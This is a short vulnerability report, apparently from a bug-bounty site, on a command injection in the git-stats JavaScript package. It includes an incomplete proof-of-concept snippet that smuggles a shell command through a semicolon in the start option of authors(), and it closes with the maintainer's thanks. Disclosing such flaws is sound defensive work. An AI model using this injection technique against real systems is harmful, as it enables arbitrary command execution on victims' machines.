Code Injection in ionicabizau/git-stats


Reported on

Aug 23rd 2020


git-stats is a js package for local git statistics including GitHub-like contributions calendars.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the options.start or options.end values, using the authors() function.

Proof of Concept

var GitStats = require("git-stats");
var g1 = new GitStats();

    start: ' " ;touch HACKED; #//',
    end: 'endstring'
}, (resp, pieData) => {


Ionică Bizău (Johnny B.) gave praise a year ago
Thank you for this and sorry for the late reply.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation